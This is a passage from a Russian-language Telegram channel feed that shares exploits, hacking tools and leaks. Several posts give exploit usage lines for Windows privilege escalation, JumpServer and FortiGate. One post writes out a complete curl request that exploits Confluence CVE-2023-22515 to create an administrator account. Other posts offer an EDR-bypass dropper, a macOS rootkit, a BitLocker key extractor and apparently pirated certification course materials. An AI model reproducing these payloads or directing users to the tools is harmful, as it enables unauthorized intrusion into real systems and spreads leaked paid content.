Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
VULN in CURL
get CVE-2023-38545 - поиграться (сегодня patch)

#curl
🔥13👍3
CVE-2023-36802
windows Local Privilege Escalation
Usage:
Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>
где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEM
POC

#win #lpe
👍8🔥4😱1
Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты из Xpanamas ciscoTalos
👍4🔥3😱1
Повышаем привилегии via apt-get
всегда смешно

#linux #up
🔥48👍9
CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action

login - adm1n/adm1n

Почитать как это работает
🔥14😱6👍2
Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых.
Домен: Эукариоты
Царство: Грибы
*
А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR.
download

#bypass #edr
👍13🔥6😱2
Внутри JS ?))
😱25👍16
ДатаСексуалы на месте ?
Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин
Переходите сразу к таблице
Только вот с CVE-2023-36778 НЕ угадали
👍15
CVE-2023-42820
Дырка в JumpServer (opensource хост-бастион)

Usage:
python CVE-2023-42820.py -t http://IP:Port -e email -u username
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2023-27997 FortiGate
Разбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPN
Скачать - exploit
Дырке 3 месяца - сколько успело проПатчиться расскажет shodan

#fortigate #rce
👍15
АНБ (National Security Agency, NSA) не спит ! И мы не будем.
Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли.
Сегодня выкатили репозиторий ELITEWOLF.
В котором плавают различные сигнатуры и аналитика, ориентированные на ICS/SCADA/OT.
Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.

update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть )))

#NSA
👍19😱2
Extract the bitlocker recovery keys
download
2 сценария: linux\windows

#bitlocker
🔥17👍7😱5
OSCP, OSWE, OSEP, OSED, OSDA, OSWA, que OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12,
CCC , CKLP, Cisco CCNA 200-125 и еще тонна всего
скачать ((((
если вы любитель испанского

#soclose
😱16👍6🔥4
MacOS_RootKit.tar.lzma
24.8 MB
macOS RootKit
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
👍10
Криво пропатчили cve-2023-33297
Получился bitcoin botnet ddos attack
Видео + описание

#btc
😱2